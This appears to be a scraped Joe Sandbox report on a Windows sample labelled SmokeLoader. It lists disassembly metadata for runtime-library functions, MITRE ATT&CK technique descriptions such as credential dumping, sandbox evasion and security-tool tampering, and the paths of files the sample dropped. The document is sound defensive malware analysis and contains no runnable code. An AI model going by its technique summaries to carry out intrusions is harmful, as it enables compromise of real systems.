Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: a1952057a4e096b13f72e09b5b2883fd541ea52a40f1c6150da809b82a797c31
Instruction ID: 666b8cab2f72e718ca0700166e1b69b788d832290e2be64dbb6745858c61b1b5
Opcode Fuzzy Hash: a1952057a4e096b13f72e09b5b2883fd541ea52a40f1c6150da809b82a797c31
Instruction Fuzzy Hash: 0601C8313006104BD7259DECEA8896AB3AAEB95714724497FD181DB7C1D6F5DC4283E8

Function 00406F7B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00403F0E: __getptd.LIBCMT ref: 00403F14
Part of subcall function 00403F0E: __getptd.LIBCMT ref: 00403F24

__getptd.LIBCMT ref: 00406F8A

Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D

__getptd.LIBCMT ref: 00406F98

Strings

csm, xrefs: 00406FA6

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: cdc7085df4bdca6dd5cb85aeb7587dd7b0b4bfb9eb8903284afffdbeadc83030
Instruction ID: 50fe1fbb3cba8a88096214dfc38fae97991bbe41bdead42efad8af6b847898c5
Opcode Fuzzy Hash: cdc7085df4bdca6dd5cb85aeb7587dd7b0b4bfb9eb8903284afffdbeadc83030
Instruction Fuzzy Hash: CF014B358006068ADF349F25E4506AEB7B5AF10315F25443FE442763D2CF3999A4DF49

Function 00404868 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,004048A1,00000000,00000000,00000000,00000000,00000000,0040A0B4,?,004062E8,00000003,004040FC,00000001,00000000,00000000), ref: 00404873
__invoke_watson.LIBCMT ref: 0040488F

Strings

PNv, xrefs: 00404873

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: DecodePointer__invoke_watson
String ID: PNv
API String ID: 4034010525-4070351811
Opcode ID: 03d653105b9490b78c419c36ceb1153564a21bb8c04f1486bee4100b04d653b3
Instruction ID: 3f05b26e2c2f593857254486353de4146da07769d251753da72b248ad5f130c6
Opcode Fuzzy Hash: 03d653105b9490b78c419c36ceb1153564a21bb8c04f1486bee4100b04d653b3
Instruction Fuzzy Hash: F5E08CBA000149BBCF013FA2DC0996A3F2AFB80750B408834FE1490030D636C930DB98

Function 00403B59 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 00403B5E
__NMSG_WRITE.LIBCMT ref: 00403B6C

Strings

PNv, xrefs: 00403B5E

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: DecodePointer
String ID: PNv
API String ID: 3527080286-4070351811
Opcode ID: 1eeefc6a7b26db4e76b873c9ae92e99a627549591bb141e4449471a95ee55ae7
Instruction ID: 6ffe08d2489e19cafbcafacff543f2e992a29dbeb95095b17cc4da8373e3439c
Opcode Fuzzy Hash: 1eeefc6a7b26db4e76b873c9ae92e99a627549591bb141e4449471a95ee55ae7
Instruction Fuzzy Hash: A9C04CB0B942106AFA103BF65C0B76966259F55B0AF048437BB06B81C2EEFD9624546F

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9VgIkx4su0.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\3E40.exe

C:\Users\user\AppData\Local\Temp\9F0D.tmp

C:\Users\user\AppData\Local\Temp\9F0D.tmp-shm

C:\Users\user\AppData\Local\Temp\A5E4.tmp

C:\Users\user\AppData\Local\Temp\A7E9.tmp

C:\Users\user\AppData\Local\Temp\AAB9.tmp

C:\Users\user\AppData\Local\Temp\AB18.tmp

C:\Users\user\AppData\Local\Temp\AF9D.tmp

C:\Users\user\AppData\Local\Temp\B04A.tmp

C:\Users\user\AppData\Local\Temp\B126.tmp

C:\Users\user\AppData\Local\Temp\FDDB.exe

Windows Analysis Report
9VgIkx4su0.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre